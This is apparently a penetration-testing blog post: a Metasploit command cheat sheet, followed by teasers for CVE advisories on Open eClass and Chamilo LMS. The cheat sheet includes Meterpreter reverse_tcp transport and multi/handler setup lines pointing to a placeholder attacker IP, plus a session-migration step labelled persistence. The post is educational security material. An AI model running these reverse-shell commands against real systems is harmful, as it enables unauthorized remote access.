Skip to main content

Metasploit


Mastering Metasploit: A Comprehensive Guide for Ethical Hackers
Metasploit, a powerful and versatile penetration testing framework, stands as a cornerstone in the toolkit of ethical hackers and security professionals. In this article, we will delve into essential Metasploit commands and techniques, ensuring you harness its full potential.

Starting with Metasploit
  • Starting PostgreSQL Manually                                
sudo systemctl start postgresql
  • Creating the Metasploit Database
sudo msfdb init
  • Updating Metasploit                                   
sudo apt update && sudo apt install metasploit-framework
  • Launching Metasploit Console                         
sudo msfconsole -q

Network Reconnaissance
  • Conducting Nmap Scan within Metasploit           
db_nmap <TARGET IP> -A -Pn

Managing Workspaces
  • List Workspaces                                   
workspace
  • Add Workspace                                     
workspace -a <workspace_name>
  • Delete Workspace                                 
workspace -d <workspace_name>

Credential Management
  • Listing Discovered Credentials                       
creds

Exploiting with Meterpreter
  • Adding a New Transport to Meterpreter Session       
transport add -t reverse_tcp -l <ATTACKER IP> -p 5555
  • Backgrounding the Session                           
background
  • Setting Up Multi/Handler                              
use multi/handler
  • Configuring Payload and Host                        
set payload windows/meterpreter/reverse_tcp
set LHOST <ATTACKER IP>
set LPORT 5555
  • Initiating Exploitation                           
exploit -j
  • Accessing Session                                 
sessions -i 1
  • Switching Transport                             
transport next

Enhancing Persistence
  • Migrating Meterpreter Shell                           
set AutoRunScript post/windows/manage/migrate

This guide provides a streamlined overview of Metasploit's core functionalities. As you embark on your ethical hacking journey, remember to use these commands responsibly and in compliance with legal and ethical standards. Stay vigilant, stay secure!

Popular posts from this blog

Open eClass – CVE-2024-26503: Unrestricted File Upload Leads to Remote Code Execution

During an assessment, I identified a severe security vulnerability within Open eClass, an e-learning platform extensively utilized across educational institutions, notably within Greece, where it is deployed by virtually all Greek Universities and educational entities. Open eClass, developed by GUnet (Greek Universities Network), is instrumental in delivering asynchronous e-learning services. The vulnerability, cataloged under CVE-2024-26503, involves an unrestricted file upload flaw that enables remote code execution (RCE), impacting versions 3.15 and earlier of the platform. This critical security lapse presents a significant risk, potentially allowing unauthorized access and control over the system, thereby compromising the integrity and security of the educational infrastructure. Affected Versions: ●   version <=  3.15 CVSSv3.1 Base Score: 9.1 ( Critical ) CVSSv3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H Exploitation Guide The vulnerability can be e...

Chamilo LMS: CVE-2024-27524 & CVE-2024-27525

CVE-2024-27524:  Stored XSS in tickets Severity:  High  (Base Score  7.1 ) CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H   Mitigation: Upgrade to Chamilo LMS 1.11.28 and above. Patch:  https://github.com/chamilo/chamilo-lms/commit/53275c152275958b33a1f87a21843daa52fb543a CVE-2024-27525:  Self XSS in social network Base Score:  Medium  (Base Score  4.6 ) CVSS Vector:  CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L Mitigation: Upgrade to Chamilo LMS 1.11.28 and above. Patch:  https://github.com/chamilo/chamilo-lms/commit/a63e03ef961e7bf2dab56f4ede6f87edef40ba0c Overview This advisory covers the discovery of two vulnerabilities within Chamilo LMS, an open-source learning management system (LMS) widely used across educational institutions. These vulnerabilities—stored cross-site scripting (Stored XSS) and self-cross-site scripting (Self XSS)—pose different levels of security risks but highlight critical consideration...

How I Use Obsidian for Penetration Testing, CVE Hunting, and Studying

In the ever-evolving realm of cyber security, the tools and techniques at our disposal are as varied as the threats we aim to counteract. Among these tools, note-taking applications play a pivotal role, not just in organizing our thoughts but in streamlining our entire workflow. Today, I'm excited to share how Obsidian, a tool I embraced over two and a half years ago while preparing for my eJPT exam, has become an indispensable ally in my journey through penetration testing, CVE hunting, and continuous learning. If you're not yet familiar with Obsidian, it's a robust note-taking application that operates on a local collection of plain text Markdown files. What sets it apart is its capability to interlink ideas, forming an expansive web of knowledge that is both intuitive and comprehensive to explore. Through considerable customization, I've developed what I consider to be an ideal method for consolidating notes, insights, and projects into a unified workspace. Here'...